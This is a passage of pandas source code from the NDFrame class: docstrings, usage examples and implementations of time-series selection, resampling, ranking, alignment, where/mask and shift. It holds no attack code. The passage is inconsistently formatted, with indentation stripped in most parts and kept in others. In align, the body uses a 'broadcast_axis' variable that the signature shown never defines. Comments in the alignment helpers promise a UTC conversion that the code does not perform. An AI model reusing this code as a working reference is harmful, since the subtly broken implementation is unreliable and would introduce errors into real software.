If the index is not a :class:`DatetimeIndex`
See Also
--------
at_time : Select values at a particular time of the day.
first : Select initial periods of time series based on a date offset.
last : Select final periods of time series based on a date offset.
DatetimeIndex.indexer_between_time : Get just the index locations for
values between particular times of the day.
Examples
--------
>>> i = pd.date_range('2018-04-09', periods=4, freq='1D20min')
>>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
>>> ts
A
2018-04-09 00:00:00 1
2018-04-10 00:20:00 2
2018-04-11 00:40:00 3
2018-04-12 01:00:00 4
>>> ts.between_time('0:15', '0:45')
A
2018-04-10 00:20:00 2
2018-04-11 00:40:00 3
You get the times that are *not* between two times by setting
``start_time`` later than ``end_time``:
>>> ts.between_time('0:45', '0:15')
A
2018-04-09 00:00:00 1
2018-04-12 01:00:00 4
"""
if axis is None:
axis = self._stat_axis_number
axis = self._get_axis_number(axis)
index = self._get_axis(axis)
try:
indexer = index.indexer_between_time(
start_time,
end_time,
include_start=include_start,
include_end=include_end,
)
except AttributeError as err:
raise TypeError("Index must be DatetimeIndex") from err
return self._take_with_is_copy(indexer, axis=axis)
def resample(
self,
rule,
axis=0,
closed: Optional[str] = None,
label: Optional[str] = None,
convention: str = "start",
kind: Optional[str] = None,
loffset=None,
base: int = 0,
on=None,
level=None,
) -> "Resampler":
"""
Resample time-series data.
Convenience method for frequency conversion and resampling of time
series. Object must have a datetime-like index (`DatetimeIndex`,
`PeriodIndex`, or `TimedeltaIndex`), or pass datetime-like values
to the `on` or `level` keyword.
Parameters
----------
rule : DateOffset, Timedelta or str
The offset string or object representing target conversion.
axis : {0 or 'index', 1 or 'columns'}, default 0
Which axis to use for up- or down-sampling. For `Series` this
will default to 0, i.e. along the rows. Must be
`DatetimeIndex`, `TimedeltaIndex` or `PeriodIndex`.
closed : {'right', 'left'}, default None
Which side of bin interval is closed. The default is 'left'
for all frequency offsets except for 'M', 'A', 'Q', 'BM',
'BA', 'BQ', and 'W' which all have a default of 'right'.
label : {'right', 'left'}, default None
Which bin edge label to label bucket with. The default is 'left'
for all frequency offsets except for 'M', 'A', 'Q', 'BM',
'BA', 'BQ', and 'W' which all have a default of 'right'.
convention : {'start', 'end', 's', 'e'}, default 'start'
For `PeriodIndex` only, controls whether to use the start or
end of `rule`.
kind : {'timestamp', 'period'}, optional, default None
Pass 'timestamp' to convert the resulting index to a
`DateTimeIndex` or 'period' to convert it to a `PeriodIndex`.
By default the input representation is retained.
loffset : timedelta, default None
Adjust the resampled time labels.
base : int, default 0
For frequencies that evenly subdivide 1 day, the "origin" of the
aggregated intervals. For example, for '5min' frequency, base could
range from 0 through 4. Defaults to 0.
on : str, optional
For a DataFrame, column to use instead of index for resampling.
Column must be datetime-like.
level : str or int, optional
For a MultiIndex, level (name or number) to use for
resampling. `level` must be datetime-like.
Returns
-------
Resampler object
See Also
--------
groupby : Group by mapping, function, label, or list of labels.
Series.resample : Resample a Series.
DataFrame.resample: Resample a DataFrame.
Notes
-----
See the `user guide
<https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#resampling>`_
for more.
To learn more about the offset strings, please see `this link
<https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#dateoffset-objects>`__.
Examples
--------
Start by creating a series with 9 one minute timestamps.
>>> index = pd.date_range('1/1/2000', periods=9, freq='T')
>>> series = pd.Series(range(9), index=index)
>>> series
2000-01-01 00:00:00 0
2000-01-01 00:01:00 1
2000-01-01 00:02:00 2
2000-01-01 00:03:00 3
2000-01-01 00:04:00 4
2000-01-01 00:05:00 5
2000-01-01 00:06:00 6
2000-01-01 00:07:00 7
2000-01-01 00:08:00 8
Freq: T, dtype: int64
Downsample the series into 3 minute bins and sum the values
of the timestamps falling into a bin.
>>> series.resample('3T').sum()
2000-01-01 00:00:00 3
2000-01-01 00:03:00 12
2000-01-01 00:06:00 21
Freq: 3T, dtype: int64
Downsample the series into 3 minute bins as above, but label each
bin using the right edge instead of the left. Please note that the
value in the bucket used as the label is not included in the bucket,
which it labels. For example, in the original series the
bucket ``2000-01-01 00:03:00`` contains the value 3, but the summed
value in the resampled bucket with the label ``2000-01-01 00:03:00``
does not include 3 (if it did, the summed value would be 6, not 3).
To include this value close the right side of the bin interval as
illustrated in the example below this one.
>>> series.resample('3T', label='right').sum()
2000-01-01 00:03:00 3
2000-01-01 00:06:00 12
2000-01-01 00:09:00 21
Freq: 3T, dtype: int64
Downsample the series into 3 minute bins as above, but close the right
side of the bin interval.
>>> series.resample('3T', label='right', closed='right').sum()
2000-01-01 00:00:00 0
2000-01-01 00:03:00 6
2000-01-01 00:06:00 15
2000-01-01 00:09:00 15
Freq: 3T, dtype: int64
Upsample the series into 30 second bins.
>>> series.resample('30S').asfreq()[0:5] # Select first 5 rows
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 NaN
2000-01-01 00:01:00 1.0
2000-01-01 00:01:30 NaN
2000-01-01 00:02:00 2.0
Freq: 30S, dtype: float64
Upsample the series into 30 second bins and fill the ``NaN``
values using the ``pad`` method.
>>> series.resample('30S').pad()[0:5]
2000-01-01 00:00:00 0
2000-01-01 00:00:30 0
2000-01-01 00:01:00 1
2000-01-01 00:01:30 1
2000-01-01 00:02:00 2
Freq: 30S, dtype: int64
Upsample the series into 30 second bins and fill the
``NaN`` values using the ``bfill`` method.
>>> series.resample('30S').bfill()[0:5]
2000-01-01 00:00:00 0
2000-01-01 00:00:30 1
2000-01-01 00:01:00 1
2000-01-01 00:01:30 2
2000-01-01 00:02:00 2
Freq: 30S, dtype: int64
Pass a custom function via ``apply``
>>> def custom_resampler(array_like):
... return np.sum(array_like) + 5
...
>>> series.resample('3T').apply(custom_resampler)
2000-01-01 00:00:00 8
2000-01-01 00:03:00 17
2000-01-01 00:06:00 26
Freq: 3T, dtype: int64
For a Series with a PeriodIndex, the keyword `convention` can be
used to control whether to use the start or end of `rule`.
Resample a year by quarter using 'start' `convention`. Values are
assigned to the first quarter of the period.
>>> s = pd.Series([1, 2], index=pd.period_range('2012-01-01',
... freq='A',
... periods=2))
>>> s
2012 1
2013 2
Freq: A-DEC, dtype: int64
>>> s.resample('Q', convention='start').asfreq()
2012Q1 1.0
2012Q2 NaN
2012Q3 NaN
2012Q4 NaN
2013Q1 2.0
2013Q2 NaN
2013Q3 NaN
2013Q4 NaN
Freq: Q-DEC, dtype: float64
Resample quarters by month using 'end' `convention`. Values are
assigned to the last month of the period.
>>> q = pd.Series([1, 2, 3, 4], index=pd.period_range('2018-01-01',
... freq='Q',
... periods=4))
>>> q
2018Q1 1
2018Q2 2
2018Q3 3
2018Q4 4
Freq: Q-DEC, dtype: int64
>>> q.resample('M', convention='end').asfreq()
2018-03 1.0
2018-04 NaN
2018-05 NaN
2018-06 2.0
2018-07 NaN
2018-08 NaN
2018-09 3.0
2018-10 NaN
2018-11 NaN
2018-12 4.0
Freq: M, dtype: float64
For DataFrame objects, the keyword `on` can be used to specify the
column instead of the index for resampling.
>>> d = dict({'price': [10, 11, 9, 13, 14, 18, 17, 19],
... 'volume': [50, 60, 40, 100, 50, 100, 40, 50]})
>>> df = pd.DataFrame(d)
>>> df['week_starting'] = pd.date_range('01/01/2018',
... periods=8,
... freq='W')
>>> df
price volume week_starting
0 10 50 2018-01-07
1 11 60 2018-01-14
2 9 40 2018-01-21
3 13 100 2018-01-28
4 14 50 2018-02-04
5 18 100 2018-02-11
6 17 40 2018-02-18
7 19 50 2018-02-25
>>> df.resample('M', on='week_starting').mean()
price volume
week_starting
2018-01-31 10.75 62.5
2018-02-28 17.00 60.0
For a DataFrame with MultiIndex, the keyword `level` can be used to
specify on which level the resampling needs to take place.
>>> days = pd.date_range('1/1/2000', periods=4, freq='D')
>>> d2 = dict({'price': [10, 11, 9, 13, 14, 18, 17, 19],
... 'volume': [50, 60, 40, 100, 50, 100, 40, 50]})
>>> df2 = pd.DataFrame(d2,
... index=pd.MultiIndex.from_product([days,
... ['morning',
... 'afternoon']]
... ))
>>> df2
price volume
2000-01-01 morning 10 50
afternoon 11 60
2000-01-02 morning 9 40
afternoon 13 100
2000-01-03 morning 14 50
afternoon 18 100
2000-01-04 morning 17 40
afternoon 19 50
>>> df2.resample('D', level=0).sum()
price volume
2000-01-01 21 110
2000-01-02 22 140
2000-01-03 32 150
2000-01-04 36 90
"""
from pandas.core.resample import get_resampler
axis = self._get_axis_number(axis)
return get_resampler(
self,
freq=rule,
label=label,
closed=closed,
axis=axis,
kind=kind,
loffset=loffset,
convention=convention,
base=base,
key=on,
level=level,
)
    def first(self: FrameOrSeries, offset) -> FrameOrSeries:
        """
        Method to subset initial periods of time series data based on a date offset.
        Parameters
        ----------
        offset : str, DateOffset, dateutil.relativedelta
        Returns
        -------
        subset : same type as caller
        Raises
        ------
        TypeError
            If the index is not a :class:`DatetimeIndex`
        See Also
        --------
        last : Select final periods of time series based on a date offset.
        at_time : Select values at a particular time of the day.
        between_time : Select values between particular times of the day.
        Examples
        --------
        >>> i = pd.date_range('2018-04-09', periods=4, freq='2D')
        >>> ts = pd.DataFrame({'A': [1,2,3,4]}, index=i)
        >>> ts
                    A
        2018-04-09  1
        2018-04-11  2
        2018-04-13  3
        2018-04-15  4
        Get the rows for the first 3 days:
        >>> ts.first('3D')
                    A
        2018-04-09  1
        2018-04-11  2
        Notice the data for 3 first calendar days were returned, not the first
        3 days observed in the dataset, and therefore data for 2018-04-13 was
        not returned.
        """
        if not isinstance(self.index, DatetimeIndex):
            raise TypeError("'first' only supports a DatetimeIndex index")
        if len(self.index) == 0:
            # Nothing to subset on an empty frame/series.
            return self
        offset = to_offset(offset)
        end_date = end = self.index[0] + offset
        # Tick-like, e.g. 3 weeks
        # For non-anchored (Tick-like) offsets, a window end that lands
        # exactly on an index entry must be excluded, so switch to positional
        # slicing with side="left"; label slicing below would include it.
        if not offset.is_anchored() and hasattr(offset, "_inc"):
            if end_date in self.index:
                end = self.index.searchsorted(end_date, side="left")
                return self.iloc[:end]
        return self.loc[:end]
def last(self: FrameOrSeries, offset) -> FrameOrSeries:
"""
Method to subset final periods of time series data based on a date offset.
Parameters
----------
offset : str, DateOffset, dateutil.relativedelta
Returns
-------
subset : same type as caller
Raises
------
TypeError
If the index is not a :class:`DatetimeIndex`
See Also
--------
first : Select initial periods of time series based on a date offset.
at_time : Select values at a particular time of the day.
between_time : Select values between particular times of the day.
Examples
--------
>>> i = pd.date_range('2018-04-09', periods=4, freq='2D')
>>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
>>> ts
A
2018-04-09 1
2018-04-11 2
2018-04-13 3
2018-04-15 4
Get the rows for the last 3 days:
>>> ts.last('3D')
A
2018-04-13 3
2018-04-15 4
Notice the data for 3 last calender days were returned, not the last
3 observed days in the dataset, and therefore data for 2018-04-11 was
not returned.
"""
if not isinstance(self.index, DatetimeIndex):
raise TypeError("'last' only supports a DatetimeIndex index")
if len(self.index) == 0:
return self
offset = to_offset(offset)
start_date = self.index[-1] - offset
start = self.index.searchsorted(start_date, side="right")
return self.iloc[start:]
def rank(
self: FrameOrSeries,
axis=0,
method: str = "average",
numeric_only: Optional[bool_t] = None,
na_option: str = "keep",
ascending: bool_t = True,
pct: bool_t = False,
) -> FrameOrSeries:
"""
Compute numerical data ranks (1 through n) along axis.
By default, equal values are assigned a rank that is the average of the
ranks of those values.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
Index to direct ranking.
method : {'average', 'min', 'max', 'first', 'dense'}, default 'average'
How to rank the group of records that have the same value (i.e. ties):
* average: average rank of the group
* min: lowest rank in the group
* max: highest rank in the group
* first: ranks assigned in order they appear in the array
* dense: like 'min', but rank always increases by 1 between groups.
numeric_only : bool, optional
For DataFrame objects, rank only numeric columns if set to True.
na_option : {'keep', 'top', 'bottom'}, default 'keep'
How to rank NaN values:
* keep: assign NaN rank to NaN values
* top: assign smallest rank to NaN values if ascending
* bottom: assign highest rank to NaN values if ascending.
ascending : bool, default True
Whether or not the elements should be ranked in ascending order.
pct : bool, default False
Whether or not to display the returned rankings in percentile
form.
Returns
-------
same type as caller
Return a Series or DataFrame with data ranks as values.
See Also
--------
core.groupby.GroupBy.rank : Rank of values within each group.
Examples
--------
>>> df = pd.DataFrame(data={'Animal': ['cat', 'penguin', 'dog',
... 'spider', 'snake'],
... 'Number_legs': [4, 2, 4, 8, np.nan]})
>>> df
Animal Number_legs
0 cat 4.0
1 penguin 2.0
2 dog 4.0
3 spider 8.0
4 snake NaN
The following example shows how the method behaves with the above
parameters:
* default_rank: this is the default behaviour obtained without using
any parameter.
* max_rank: setting ``method = 'max'`` the records that have the
same values are ranked using the highest rank (e.g.: since 'cat'
and 'dog' are both in the 2nd and 3rd position, rank 3 is assigned.)
* NA_bottom: choosing ``na_option = 'bottom'``, if there are records
with NaN values they are placed at the bottom of the ranking.
* pct_rank: when setting ``pct = True``, the ranking is expressed as
percentile rank.
>>> df['default_rank'] = df['Number_legs'].rank()
>>> df['max_rank'] = df['Number_legs'].rank(method='max')
>>> df['NA_bottom'] = df['Number_legs'].rank(na_option='bottom')
>>> df['pct_rank'] = df['Number_legs'].rank(pct=True)
>>> df
Animal Number_legs default_rank max_rank NA_bottom pct_rank
0 cat 4.0 2.5 3.0 2.5 0.625
1 penguin 2.0 1.0 1.0 1.0 0.250
2 dog 4.0 2.5 3.0 2.5 0.625
3 spider 8.0 4.0 4.0 4.0 1.000
4 snake NaN NaN NaN 5.0 NaN
"""
axis = self._get_axis_number(axis)
if na_option not in {"keep", "top", "bottom"}:
msg = "na_option must be one of 'keep', 'top', or 'bottom'"
raise ValueError(msg)
def ranker(data):
ranks = algos.rank(
data.values,
axis=axis,
method=method,
ascending=ascending,
na_option=na_option,
pct=pct,
)
ranks = self._constructor(ranks, **data._construct_axes_dict())
return ranks.__finalize__(self)
# if numeric_only is None, and we can't get anything, we try with
# numeric_only=True
if numeric_only is None:
try:
return ranker(self)
except TypeError:
numeric_only = True
if numeric_only:
data = self._get_numeric_data()
else:
data = self
return ranker(data)
_shared_docs[
"align"
] = """
Align two objects on their axes with the specified join method.
Join method is specified for each axis Index.
Parameters
----------
other : DataFrame or Series
join : {'outer', 'inner', 'left', 'right'}, default 'outer'
axis : allowed axis of the other object, default None
Align on index (0), columns (1), or both (None).
level : int or level name, default None
Broadcast across a level, matching Index values on the
passed MultiIndex level.
copy : bool, default True
Always returns new objects. If copy=False and no reindexing is
required then original objects are returned.
fill_value : scalar, default np.NaN
Value to use for missing values. Defaults to NaN, but can be any
"compatible" value.
method : {'backfill', 'bfill', 'pad', 'ffill', None}, default None
Method to use for filling holes in reindexed Series:
- pad / ffill: propagate last valid observation forward to next valid.
- backfill / bfill: use NEXT valid observation to fill gap.
limit : int, default None
If method is specified, this is the maximum number of consecutive
NaN values to forward/backward fill. In other words, if there is
a gap with more than this number of consecutive NaNs, it will only
be partially filled. If method is not specified, this is the
maximum number of entries along the entire axis where NaNs will be
filled. Must be greater than 0 if not None.
fill_axis : %(axes_single_arg)s, default 0
Filling axis, method and limit.
broadcast_axis : %(axes_single_arg)s, default None
Broadcast values along this axis, if aligning two objects of
different dimensions.
Returns
-------
(left, right) : (%(klass)s, type of other)
Aligned objects.
"""
    @Appender(_shared_docs["align"] % _shared_doc_kwargs)
    def align(
        self,
        other,
        join="outer",
        axis=None,
        level=None,
        copy=True,
        fill_value=None,
        method=None,
        limit=None,
        fill_axis=0,
    ):
        # Normalize fill-method aliases (e.g. "ffill" -> "pad") up front.
        method = missing.clean_fill_method(method)
        # broadcast_axis=1 with mismatched ndim: expand the 1-D side (a
        # Series) into a DataFrame by repeating it across the other object's
        # columns, then align frame-to-frame.
        if broadcast_axis == 1 and self.ndim != other.ndim:
            if isinstance(self, ABCSeries):
                # this means other is a DataFrame, and we need to broadcast
                # self
                cons = self._constructor_expanddim
                df = cons(
                    {c: self for c in other.columns}, **other._construct_axes_dict()
                )
                return df._align_frame(
                    other,
                    join=join,
                    axis=axis,
                    level=level,
                    copy=copy,
                    fill_value=fill_value,
                    method=method,
                    limit=limit,
                    fill_axis=fill_axis,
                )
            elif isinstance(other, ABCSeries):
                # this means self is a DataFrame, and we need to broadcast
                # other
                cons = other._constructor_expanddim
                df = cons(
                    {c: other for c in self.columns}, **self._construct_axes_dict()
                )
                return self._align_frame(
                    df,
                    join=join,
                    axis=axis,
                    level=level,
                    copy=copy,
                    fill_value=fill_value,
                    method=method,
                    limit=limit,
                    fill_axis=fill_axis,
                )
        if axis is not None:
            axis = self._get_axis_number(axis)
        # Dispatch on the type of ``other``: frame-to-frame vs *-to-series.
        if isinstance(other, ABCDataFrame):
            return self._align_frame(
                other,
                join=join,
                axis=axis,
                level=level,
                copy=copy,
                fill_value=fill_value,
                method=method,
                limit=limit,
                fill_axis=fill_axis,
            )
        elif isinstance(other, ABCSeries):
            return self._align_series(
                other,
                join=join,
                axis=axis,
                level=level,
                copy=copy,
                fill_value=fill_value,
                method=method,
                limit=limit,
                fill_axis=fill_axis,
            )
        else:  # pragma: no cover
            raise TypeError(f"unsupported type: {type(other)}")
    def _align_frame(
        self,
        other,
        join="outer",
        axis=None,
        level=None,
        copy: bool_t = True,
        fill_value=None,
        method=None,
        limit=None,
        fill_axis=0,
    ):
        # Align ``self`` (Series or DataFrame) with a DataFrame ``other``:
        # join the requested axes, reindex both sides, optionally fill, and
        # return the aligned (left, right) pair.
        # defaults
        join_index, join_columns = None, None
        ilidx, iridx = None, None
        clidx, cridx = None, None
        is_series = isinstance(self, ABCSeries)
        # Join the row index unless alignment was restricted to axis 1.
        if axis is None or axis == 0:
            if not self.index.equals(other.index):
                join_index, ilidx, iridx = self.index.join(
                    other.index, how=join, level=level, return_indexers=True
                )
        # Join the columns unless restricted to axis 0 (a Series has none).
        if axis is None or axis == 1:
            if not is_series and not self.columns.equals(other.columns):
                join_columns, clidx, cridx = self.columns.join(
                    other.columns, how=join, level=level, return_indexers=True
                )
        if is_series:
            reindexers = {0: [join_index, ilidx]}
        else:
            reindexers = {0: [join_index, ilidx], 1: [join_columns, clidx]}
        left = self._reindex_with_indexers(
            reindexers, copy=copy, fill_value=fill_value, allow_dups=True
        )
        # other must be always DataFrame
        right = other._reindex_with_indexers(
            {0: [join_index, iridx], 1: [join_columns, cridx]},
            copy=copy,
            fill_value=fill_value,
            allow_dups=True,
        )
        # Fill holes introduced by the reindex when a fill method was given.
        if method is not None:
            left = self._ensure_type(
                left.fillna(method=method, axis=fill_axis, limit=limit)
            )
            right = right.fillna(method=method, axis=fill_axis, limit=limit)
        # if DatetimeIndex have different tz, convert to UTC
        if is_datetime64tz_dtype(left.index):
            if left.index.tz != right.index.tz:
                if join_index is not None:
                    left.index = join_index
                    right.index = join_index
        return left.__finalize__(self), right.__finalize__(other)
    def _align_series(
        self,
        other,
        join="outer",
        axis=None,
        level=None,
        copy: bool_t = True,
        fill_value=None,
        method=None,
        limit=None,
        fill_axis=0,
    ):
        # Align ``self`` with a Series ``other``; returns the aligned
        # (left, right) pair, filled per ``fill_value``/``method``.
        is_series = isinstance(self, ABCSeries)
        # series/series compat, other must always be a Series
        if is_series:
            if axis:
                raise ValueError("cannot align series to a series other than axis 0")
            # equal
            if self.index.equals(other.index):
                join_index, lidx, ridx = None, None, None
            else:
                join_index, lidx, ridx = self.index.join(
                    other.index, how=join, level=level, return_indexers=True
                )
            left = self._reindex_indexer(join_index, lidx, copy)
            right = other._reindex_indexer(join_index, ridx, copy)
        else:
            # one has > 1 ndim
            fdata = self._data
            if axis == 0:
                # Align DataFrame rows with the Series index.  Note the
                # block manager's axes are transposed relative to the frame,
                # so the frame's rows are manager axis 1 here.
                join_index = self.index
                lidx, ridx = None, None
                if not self.index.equals(other.index):
                    join_index, lidx, ridx = self.index.join(
                        other.index, how=join, level=level, return_indexers=True
                    )
                if lidx is not None:
                    fdata = fdata.reindex_indexer(join_index, lidx, axis=1)
            elif axis == 1:
                # Align DataFrame columns with the Series index (manager
                # axis 0, per the transposition noted above).
                join_index = self.columns
                lidx, ridx = None, None
                if not self.columns.equals(other.index):
                    join_index, lidx, ridx = self.columns.join(
                        other.index, how=join, level=level, return_indexers=True
                    )
                if lidx is not None:
                    fdata = fdata.reindex_indexer(join_index, lidx, axis=0)
            else:
                raise ValueError("Must specify axis=0 or 1")
            # Honor copy=True even when no reindex happened.
            if copy and fdata is self._data:
                fdata = fdata.copy()
            left = self._constructor(fdata)
            if ridx is None:
                right = other
            else:
                right = other.reindex(join_index, level=level)
        # fill
        fill_na = notna(fill_value) or (method is not None)
        if fill_na:
            left = left.fillna(fill_value, method=method, limit=limit, axis=fill_axis)
            right = right.fillna(fill_value, method=method, limit=limit)
        # if DatetimeIndex have different tz, convert to UTC
        if is_series or (not is_series and axis == 0):
            if is_datetime64tz_dtype(left.index):
                if left.index.tz != right.index.tz:
                    if join_index is not None:
                        left.index = join_index
                        right.index = join_index
        return left.__finalize__(self), right.__finalize__(other)
    def _where(
        self,
        cond,
        other=np.nan,
        inplace=False,
        axis=None,
        level=None,
        errors="raise",
        try_cast=False,
    ):
        """
        Equivalent to public method `where`, except that `other` is not
        applied as a function even if callable. Used in __setitem__.
        """
        inplace = validate_bool_kwarg(inplace, "inplace")
        # align the cond to same shape as myself
        cond = com.apply_if_callable(cond, self)
        if isinstance(cond, NDFrame):
            cond, _ = cond.align(self, join="right", broadcast_axis=1)
        else:
            if not hasattr(cond, "shape"):
                cond = np.asanyarray(cond)
            if cond.shape != self.shape:
                raise ValueError("Array conditional must be same shape as self")
            cond = self._constructor(cond, **self._construct_axes_dict())
        # make sure we are boolean
        # NOTE(review): NA positions in ``cond`` are filled with True when
        # inplace (so after the inversion below they become False and are
        # left untouched by putmask) but with False otherwise (so the
        # ``where`` path replaces them with ``other``) — confirm the two
        # paths are intended to treat NA conditions this way.
        fill_value = bool(inplace)
        cond = cond.fillna(fill_value)
        msg = "Boolean array expected for the condition, not {dtype}"
        if not isinstance(cond, ABCDataFrame):
            # This is a single-dimensional object.
            if not is_bool_dtype(cond):
                raise ValueError(msg.format(dtype=cond.dtype))
        elif not cond.empty:
            for dt in cond.dtypes:
                if not is_bool_dtype(dt):
                    raise ValueError(msg.format(dtype=dt))
        # putmask replaces where the mask is True, whereas ``where`` keeps
        # values where cond is True — hence the inversion for the inplace path.
        cond = -cond if inplace else cond
        # try to align with other
        try_quick = True
        if hasattr(other, "align"):
            # align with me
            if other.ndim <= self.ndim:
                _, other = self.align(
                    other, join="left", axis=axis, level=level, fill_value=np.nan
                )
                # if we are NOT aligned, raise as we cannot where index
                if axis is None and not all(
                    other._get_axis(i).equals(ax) for i, ax in enumerate(self.axes)
                ):
                    raise InvalidIndexError
            # slice me out of the other
            else:
                raise NotImplementedError(
                    "cannot align with a higher dimensional NDFrame"
                )
        if isinstance(other, np.ndarray):
            if other.shape != self.shape:
                # Mismatched ndarray replacement is only valid for 1-D self
                # with a scalar-like or exactly-matching replacement set.
                if self.ndim == 1:
                    icond = cond.values
                    # GH 2745 / GH 4192
                    # treat like a scalar
                    if len(other) == 1:
                        other = np.array(other[0])
                    # GH 3235
                    # match True cond to other
                    elif len(cond[icond]) == len(other):
                        # try to not change dtype at first (if try_quick)
                        if try_quick:
                            new_other = com.values_from_object(self)
                            new_other = new_other.copy()
                            new_other[icond] = other
                            other = new_other
                    else:
                        raise ValueError(
                            "Length of replacements must equal series length"
                        )
                else:
                    raise ValueError(
                        "other must be the same shape as self when an ndarray"
                    )
            # we are the same shape, so create an actual object for alignment
            else:
                other = self._constructor(other, **self._construct_axes_dict())
        if axis is None:
            axis = 0
        if self.ndim == getattr(other, "ndim", 0):
            align = True
        else:
            align = self._get_axis_number(axis) == 1
        # Translate the user-facing axis into block-manager layout.
        block_axis = self._get_block_manager_axis(axis)
        if inplace:
            # we may have different type blocks come out of putmask, so
            # reconstruct the block manager
            self._check_inplace_setting(other)
            new_data = self._data.putmask(
                mask=cond,
                new=other,
                align=align,
                inplace=True,
                axis=block_axis,
                transpose=self._AXIS_REVERSED,
            )
            # inplace path mutates self and returns None.
            self._update_inplace(new_data)
        else:
            new_data = self._data.where(
                other=other,
                cond=cond,
                align=align,
                errors=errors,
                try_cast=try_cast,
                axis=block_axis,
            )
            return self._constructor(new_data).__finalize__(self)
_shared_docs[
"where"
] = """
Replace values where the condition is %(cond_rev)s.
Parameters
----------
cond : bool %(klass)s, array-like, or callable
Where `cond` is %(cond)s, keep the original value. Where
%(cond_rev)s, replace with corresponding value from `other`.
If `cond` is callable, it is computed on the %(klass)s and
should return boolean %(klass)s or array. The callable must
not change input %(klass)s (though pandas doesn't check it).
other : scalar, %(klass)s, or callable
Entries where `cond` is %(cond_rev)s are replaced with
corresponding value from `other`.
If other is callable, it is computed on the %(klass)s and
should return scalar or %(klass)s. The callable must not
change input %(klass)s (though pandas doesn't check it).
inplace : bool, default False
Whether to perform the operation in place on the data.
axis : int, default None
Alignment axis if needed.
level : int, default None
Alignment level if needed.
errors : str, {'raise', 'ignore'}, default 'raise'
Note that currently this parameter won't affect
the results and will always coerce to a suitable dtype.
- 'raise' : allow exceptions to be raised.
- 'ignore' : suppress exceptions. On error return original object.
try_cast : bool, default False
Try to cast the result back to the input type (if possible).
Returns
-------
Same type as caller
See Also
--------
:func:`DataFrame.%(name_other)s` : Return an object of same shape as
self.
Notes
-----
The %(name)s method is an application of the if-then idiom. For each
element in the calling DataFrame, if ``cond`` is ``%(cond)s`` the
element is used; otherwise the corresponding element from the DataFrame
``other`` is used.
The signature for :func:`DataFrame.where` differs from
:func:`numpy.where`. Roughly ``df1.where(m, df2)`` is equivalent to
``np.where(m, df1, df2)``.
For further details and examples see the ``%(name)s`` documentation in
:ref:`indexing <indexing.where_mask>`.
Examples
--------
>>> s = pd.Series(range(5))
>>> s.where(s > 0)
0 NaN
1 1.0
2 2.0
3 3.0
4 4.0
dtype: float64
>>> s.mask(s > 0)
0 0.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
>>> s.where(s > 1, 10)
0 10
1 10
2 2
3 3
4 4
dtype: int64
>>> df = pd.DataFrame(np.arange(10).reshape(-1, 2), columns=['A', 'B'])
>>> df
A B
0 0 1
1 2 3
2 4 5
3 6 7
4 8 9
>>> m = df %% 3 == 0
>>> df.where(m, -df)
A B
0 0 -1
1 -2 3
2 -4 -5
3 6 -7
4 -8 9
>>> df.where(m, -df) == np.where(m, df, -df)
A B
0 True True
1 True True
2 True True
3 True True
4 True True
>>> df.where(m, -df) == df.mask(~m, -df)
A B
0 True True
1 True True
2 True True
3 True True
4 True True
"""
@Appender(
_shared_docs["where"]
% dict(
_shared_doc_kwargs,
cond="True",
cond_rev="False",
name="where",
name_other="mask",
)
)
def where(
self,
cond,
other=np.nan,
inplace=False,
axis=None,
level=None,
errors="raise",
try_cast=False,
):
other = com.apply_if_callable(other, self)
return self._where(
cond, other, inplace, axis, level, errors=errors, try_cast=try_cast
)
@Appender(
_shared_docs["where"]
% dict(
_shared_doc_kwargs,
cond="False",
cond_rev="True",
name="mask",
name_other="where",
)
)
def mask(
self,
cond,
other=np.nan,
inplace=False,
axis=None,
level=None,
errors="raise",
try_cast=False,
):
inplace = validate_bool_kwarg(inplace, "inplace")
cond = com.apply_if_callable(cond, self)
# see gh-21891
if not hasattr(cond, "__invert__"):
cond = np.array(cond)
return self.where(
~cond,
other=other,
inplace=inplace,
axis=axis,
level=level,
try_cast=try_cast,
errors=errors,
)
_shared_docs[
"shift"
] = """
Shift index by desired number of periods with an optional time `freq`.
When `freq` is not passed, shift the index without realigning the data.
If `freq` is passed (in this case, the index must be date or datetime,
or it will raise a `NotImplementedError`), the index will be
increased using the periods and the `freq`.
Parameters
----------
periods : int
Number of periods to shift. Can be positive or negative.
freq : DateOffset, tseries.offsets, timedelta, or str, optional
Offset to use from the tseries module or time rule (e.g. 'EOM').
If `freq` is specified then the index values are shifted but the
data is not realigned. That is, use `freq` if you would like to
extend the index when shifting and preserve the original data.
axis : {0 or 'index', 1 or 'columns', None}, default None
Shift direction.
fill_value : object, optional
The scalar value to use for newly introduced missing values.
the default depends on the dtype of `self`.
For numeric data, ``np.nan`` is used.
For datetime, timedelta, or period data, etc. :attr:`NaT` is used.
For extension dtypes, ``self.dtype.na_value`` is used.
.. versionchanged:: 0.24.0
Returns
-------
%(klass)s
Copy of input object, shifted.
See Also
--------
Index.shift : Shift values of Index.
DatetimeIndex.shift : Shift values of DatetimeIndex.
PeriodIndex.shift : Shift values of PeriodIndex.
tshift : Shift the time index, using the index's frequency if
available.
Examples
--------
>>> df = pd.DataFrame({'Col1': [10, 20, 15, 30, 45],
... 'Col2': [13, 23, 18, 33, 48],
... 'Col3': [17, 27, 22, 37, 52]})
>>> df.shift(periods=3)
Col1 Col2 Col3
0 NaN NaN NaN
1 NaN NaN NaN
2 NaN NaN NaN
3 10.0 13.0 17.0
4 20.0 23.0 27.0
>>> df.shift(periods=1, axis='columns')
Col1 Col2 Col3
0 NaN 10.0 13.0
1 NaN 20.0 23.0
2 NaN 15.0 18.0
3 NaN 30.0 33.0
4 NaN 45.0 48.0
>>> df.shift(periods=3, fill_value=0)
Col1 Col2 Col3
0 0 0 0
1 0 0 0
2 0 0 0
3 10 13 17
4 20 23 27
"""
@Appender(_shared_docs["shift"] % _shared_doc_kwargs)
def shift(
self: FrameOrSeries, periods=1, freq=None, axis=0, fill_value=None
) -> FrameOrSeries:
if periods == 0:
return self.copy()
block_axis = self._get_block_manager_axis(axis)
if freq is None:
new_data = self._data.shift(
periods=periods, axis=block_axis, fill_value=fill_value
)
else:
return self.tshift(periods, freq)
return self._constructor(new_data).__finalize__(self)
def slice_shift(self: FrameOrSeries, periods: int = 1, axis=0) -> FrameOrSeries:
"""
Equivalent to `shift` without copying data.
The shifted data will not include the dropped periods and the
shifted axis will be smaller than the original.
